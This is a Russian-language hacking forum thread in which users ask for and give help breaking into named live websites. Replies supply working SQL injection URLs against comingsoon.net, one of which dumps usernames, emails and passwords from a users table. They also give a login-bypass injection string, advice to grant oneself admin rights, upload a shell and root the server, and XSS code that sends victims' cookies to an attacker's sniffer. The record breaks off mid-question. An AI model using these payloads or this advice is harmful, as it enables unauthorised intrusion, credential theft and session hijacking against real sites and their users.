Ваши вопросы по уязвимостям.

Sanic1977
никак нема иьекта )

 

инъект отсутствует

 

http://www.comingsoon.net/news.php?id=1'

Получил вот такой ответ

Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'

Есть ли тут injection? Если есть пожалуйста помогите раскрутить а то чет никак не могу понять как запросик зделать.

 

Есть, но там по-моему только бенчмарком инфу из бд доставать посимвольно, ибо идет два запроса

 

0nep@t0p, я бы так не утверждал .. 2 поля и причём вывод есть
http://www.comingsoon.net/news.php?id=1+and+1=0+union+select+version(),1/*
4.1.22
на брут не ставил.. ибо мне это не к чему ..

 

тоесть в принципе можно поковырять до конца? может у кого еще какие варианты,?

 

Докопался до mysql сервера, благодаря чему есть возможно "дарить" максимальные права для определенных пользователей.
Mysql привязан к директадминЧеку....
Сам вопрос: можно ли при определенных махинациях с Mysql(не брут рутовых паролей) и "дарением" прав конкретным пользователям - получить неограниченный доступ хождения по папкам и файлам.
В то числе и рутовским.
такое можно сотворить?

 

Товарищи, будте внимательнее =)

Code:

http://www.comingsoon.net/news.php?id=1+and+1=0+union+select+concat_ws(char(58),user_id,name,email,password,title,access),1+from+NEX_USERS+limit+0,1/*

 

Ну так для начала подари себе права админа, зайди в админку, через нее залей шелл, порутай систему и сможешь просматривать, под правами root все папки и файлы =)
PS Иначе никак, на то они и рутовские

 

Code:

http://db.zenyro.ru/items/use.html'

Возможна ли инъекция?

 

DimOnOID
да это иьект твоя задача закоментировать не нужные данные запроса и подобрать количество колонок..

 

http://db.zenyro.ru/items/use.html'order+by+2--+
1 колонка..вывода нету..как слепую заюзать не удаётца

 

Проблема с:

HTML:

http://www.mcmusic.ie/index.asp?secID=1'&part=1

Помогите раскрутить. Очень нужно

 

~EviL~
ms access, колонок 5, к системным таблицам доступа нет => узнавать имена таблиц\колонок только перебором...

 

Спасибо Попробую довести до победного конца =)

 

в этом деле новичок.
еще пока не научился использовать XSS но уже нашел парочку. может кому пригодится кто шарит в этом.


там в нескольких нужно вбивать в поля.
PS/ сильно не пинать я только учусь.

 

а чо там использвать - втавляй вместо alert('xss') такой код:

window.location.href='http://твой_сайт/s.gif?'+document.cookie;

где s.gif - твой снифер

и давай такую ссылку, чтобы он по ней тыцкнул тому, чьи куки хочешь поиметь

 

с перенаправлением галимо и палевно. Лучше создавать картинку посредством яваскрипт

 

Есть сервер с багнутым ПОСТ запросом.
Login, pwd.
Баг в первом варианте. Причем надо чтоб было хоть что - либо во втором.
Пример:

Login: ' or 1=(@@version)--
Pwd: kakawka

:
Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'or'.


Что посоветуете в данном вопросе? (чтоб вывело результат первого запроса)

 

У меня сейчас подобная проблема. При вводе вышеуказанной комбинации сервер отвечает:

Пробелы он не воспринимает. Как можно указать пробелы? Пытался